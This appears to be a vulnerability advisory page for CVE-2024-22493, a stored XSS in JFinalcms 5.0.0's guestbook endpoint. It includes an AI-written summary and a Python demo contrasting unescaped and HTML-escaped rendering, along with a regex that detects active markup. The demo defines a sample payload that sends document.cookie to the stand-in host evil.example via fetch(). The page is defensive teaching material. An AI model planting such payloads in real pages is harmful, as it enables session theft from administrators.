VYPR
Moderate severity · NVD Advisory · Published Jan 12, 2024 · Updated Sep 10, 2024

CVE-2024-22493

Description

A stored XSS vulnerability exists in JFinalcms 5.0.0 via the content parameter of /guestbook/save, which allows remote attackers to inject arbitrary web script or HTML.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Stored XSS in JFinalcms 5.0.0 via /guestbook/save allows remote unauthenticated attackers to inject arbitrary scripts.

A stored cross-site scripting (XSS) vulnerability exists in JFinalcms 5.0.0 in the /guestbook/save endpoint, specifically in the content parameter. The value is neither validated on input nor HTML-encoded on output, so an attacker can store arbitrary web script that executes later in the browser of whoever views the entry [1][2].

Exploitation does not require authentication: the attacker sends a POST request to /guestbook/save with a content parameter carrying a script payload. The payload is stored in the database and fires when an administrator visits /admin/guestbook to review the guestbook entries [2].

When an administrator opens the affected page, the injected script runs in their browser with the privileges of the admin session, enabling theft of session cookies, defacement, or any action the admin UI permits. The impact is high, since a compromised admin session can lead to full control of the application [1][2].

As of publication, no official patch has been released. Until one is available, operators should HTML-encode the content field at the point where it is rendered into the admin page (input validation alone is not a sufficient fix for stored XSS), or restrict access to the guestbook functionality. The vulnerability is publicly documented and a proof-of-concept (PoC) is available [2].
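The following is an added example, not code from JFinalcms or from the cited references. It models the vulnerable pattern described above (stored content concatenated verbatim into the admin guestbook page) next to the hardened pattern (HTML-encoding the untrusted field at render time). The entry model, the function names, and the sample payload are illustrative assumptions; the payload is not the PoC from [2].

```python
import html
import re
from dataclasses import dataclass

# Constructed sample input: what an attacker might POST to /guestbook/save in
# the `content` parameter. Illustrative only, not the published PoC.
ATTACKER_CONTENT = '<img src=x onerror="fetch(\'//evil.example/?c=\'+document.cookie)">'
BENIGN_CONTENT = "Nice site! Love it <3"


@dataclass
class GuestbookEntry:
    """Hypothetical stand-in for a stored guestbook row (not JFinalcms's model)."""
    id: int
    content: str


def save_entry(store: list, entry_id: int, content: str) -> GuestbookEntry:
    """Stores whatever was posted, as the CVE description says the real
    application does: no validation and no encoding at save time."""
    entry = GuestbookEntry(entry_id, content)
    store.append(entry)
    return entry


def render_admin_guestbook_vulnerable(store: list) -> str:
    """Vulnerable pattern: stored content is concatenated into the admin page
    verbatim, so any HTML or script in it runs in the administrator's browser."""
    rows = "".join(f"<tr><td>{e.id}</td><td>{e.content}</td></tr>" for e in store)
    return f"<table>{rows}</table>"


def render_admin_guestbook_fixed(store: list) -> str:
    """Hardened pattern: HTML-encode the untrusted field where it is placed into
    HTML element content. The database still holds the raw payload; the
    rendering step is what decides whether it is treated as markup."""
    rows = "".join(
        f"<tr><td>{e.id}</td><td>{html.escape(e.content, quote=True)}</td></tr>"
        for e in store
    )
    return f"<table>{rows}</table>"


# Crude detector used only by this example: a real <script> tag, or a real
# tag carrying an on*= event-handler attribute. Escaped text (&lt;img ...)
# never forms a tag, so it does not match.
_ACTIVE_MARKUP = re.compile(r"<script|<\w+[^>]*\bon\w+\s*=", re.IGNORECASE)


def contains_active_markup(rendered: str) -> bool:
    return _ACTIVE_MARKUP.search(rendered) is not None


def demo() -> dict:
    """Stores a benign and a malicious entry, renders both ways, and reports
    whether the attacker's markup survives as executable HTML."""
    store: list = []
    save_entry(store, 1, BENIGN_CONTENT)
    save_entry(store, 2, ATTACKER_CONTENT)
    vuln = render_admin_guestbook_vulnerable(store)
    fixed = render_admin_guestbook_fixed(store)
    return {
        "vulnerable_executes": contains_active_markup(vuln),
        "fixed_executes": contains_active_markup(fixed),
        "fixed_html": fixed,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

Two design points worth noting. First, the fix lives in the render path, not in `save_entry`: the same raw value stays in the database, so any other view that prints it must also encode it. Second, `html.escape` is the correct primitive only for HTML element content and quoted attribute values; if the guestbook content were ever placed inside a `<script>` block or a URL, a different encoder for that context would be required.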

AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

Package: com.jfinal:jfinal (Maven)
Affected versions: <= 5.0.0
Patched versions: none listed

Affected products: 2

Patches: 0 (no patches discovered yet)


References: 3
